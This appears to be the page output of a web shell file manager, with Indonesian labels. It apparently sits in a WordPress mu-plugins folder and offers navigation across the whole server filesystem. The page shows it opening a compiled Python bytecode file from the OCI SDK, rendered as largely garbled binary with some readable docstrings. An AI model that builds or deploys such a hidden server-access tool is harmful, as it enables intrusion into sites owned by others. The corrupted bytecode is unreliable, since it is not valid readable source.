📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
fusion_apps
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/fusion_apps/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_new_instance_details.cpython-39.pyc
a ���f� � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�CreateServiceAttachmentDetails� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )�CreateNewInstanceDetailsz3 Information about the service attachment. c K sB ddddd�| _ dddd d�| _d | _d | _d | _d | _d| _d S )a� Initializes a new CreateNewInstanceDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.fusion_apps.models.CreateNewInstanceDetails.action` attribute of this class is ``CREATE_NEW_INSTANCE`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param action: The value to assign to the action property of this CreateNewInstanceDetails. Allowed values for this property are: "CREATE_NEW_INSTANCE", "ATTACH_EXISTING_INSTANCE" :type action: str :param details: The value to assign to the details property of this CreateNewInstanceDetails. :type details: oci.fusion_apps.models.CreateServiceInstanceDetails :param freeform_tags: The value to assign to the freeform_tags property of this CreateNewInstanceDetails. :type freeform_tags: dict(str, str) :param defined_tags: The value to assign to the defined_tags property of this CreateNewInstanceDetails. :type defined_tags: dict(str, dict(str, object)) �strZCreateServiceInstanceDetailszdict(str, str)zdict(str, dict(str, object)))�action�details� freeform_tags�defined_tagsr r ZfreeformTagsZdefinedTagsNZCREATE_NEW_INSTANCE)Z swagger_typesZ attribute_map�_action�_details�_freeform_tags� _defined_tags)�self�kwargs� r �V/usr/lib/python3.9/site-packages/oci/fusion_apps/models/create_new_instance_details.py�__init__ s ��z!CreateNewInstanceDetails.__init__c C s | j S )z� **[Required]** Gets the details of this CreateNewInstanceDetails. :return: The details of this CreateNewInstanceDetails. :rtype: oci.fusion_apps.models.CreateServiceInstanceDetails �r �r r r r r <